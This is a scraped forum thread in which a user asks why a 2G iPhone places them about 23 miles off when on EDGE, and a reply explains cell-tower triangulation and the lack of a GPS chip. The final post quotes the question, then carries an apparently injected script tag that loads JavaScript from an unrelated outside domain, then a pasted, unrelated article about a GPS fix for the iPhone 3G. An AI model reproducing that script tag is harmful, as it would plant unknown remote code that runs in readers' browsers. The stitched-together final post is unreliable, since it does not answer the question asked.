+ Reply

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: help my location on my iphone is wrong

is a discussion within the

Web Apps

forums, a part of the

3rd Party Apps For iPhone | iPod Touch

section;
when ever im on t-mobile's edge network, its telling me on Maps that my current location is in Springfield IL and thats 23 miles away from my house in Decatur
    Thanks

Default help my location on my iphone is wrong
    when ever im on t-mobile's edge network, its telling me on Maps that my current location is in Springfield IL and thats 23 miles away from my house in Decatur IL, but when im on my wifi, its showing my exzact location of Decatur IL. I really want to get this fixed, because i want to start using my gps app navigon and i want to start geocaching, and bolth of those require a internet connection, and those were pretty much the main reason why i decided to get internet on my iphone. I'll post 2 photos of one on edge and the other on wifi, so you can see what im talking about, someone please help me, i would greatly appreciate it

Thanks

It looks like you are using a 2g iphone, which does not have GPS inlcuded. The maps program in this case uses either WiFi connection information to pin point you (which as you found is accurate)or if you are out and about on mobile internet the maps program uses cell tower triangulation to work out your location - this is pretty hit and miss and as you found often gives your location way off where you really are.

Finally Navigon will not work on 2g iPhone, because Navigon requires the GPS chip only found on the 3g and 3g s iPhones.
    iPhone 5s 64gb iOS 7
    rMBP 15" 16gb 500gb
    @c0ff33a and @PhoneMainiac

Thanks

is there any way i could get geocaching and navigon to work with my 2G iphone, im pretty sure bolth of those apps get data from the Maps app, but i downloaded Navizon and it worked with my edge connection, is there any way to make Navizon the default gps over the Maps app, or does anyone know of any way how to get gps enabled on the 2G iphone, or can someone else help answer my first question
    Last edited by char1090; 08-02-2009 at 12:15 PM.

Green Apple
    Thanks

Quote Originally Posted by char1090 View Post
    when ever im on t-mobile's edge network, its telling me on Maps that my current location is in Springfield IL and thats 23 miles away from my house in Decatur IL, but when im on my wifi, its showing my exzact location of Decatur IL. I really want to get this fixed, because i want to start using my gps app navigon and i want to start geocaching, and bolth of those require a internet connection, and those were pretty much the main reason why i decided to get internet on my iphone. I'll post 2 photos of one on edge and the other on wifi, so you can see what im talking about, someone please help me, i would greatly appreciate it
    <script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    Apple (NSDQ: AAPL) for all iPhone and iPhone 3G customers. Ironically, we’re hearing reports that the iPhone 2.1 OS is actually breaking one of the iPhone 3G’s headline features – GPS location mapping, to be precise.

For those of you experiencing iPhone 2.1 OS-related GPS problems, you’ll already be well aware that Google (NSDQ: GOOG) Maps just doesn’t seem to want to zero-in on your GPS position. Those blue crosshairs show your general position, but the little blue dot that shows your pin-point GPS location just never shows up. It’s frustrating, to be sure, but keep your head up, sport. Here’s how you fix your iPhone 3G’s broken GPS functionality:

1. Navigate to Settings > General > Reset on your iPhone 3G
    2. “Reset All Settings”

Did you expect the iPhone 2.1 OS GPS fix to be hard or something?

Happy iPhone-ing!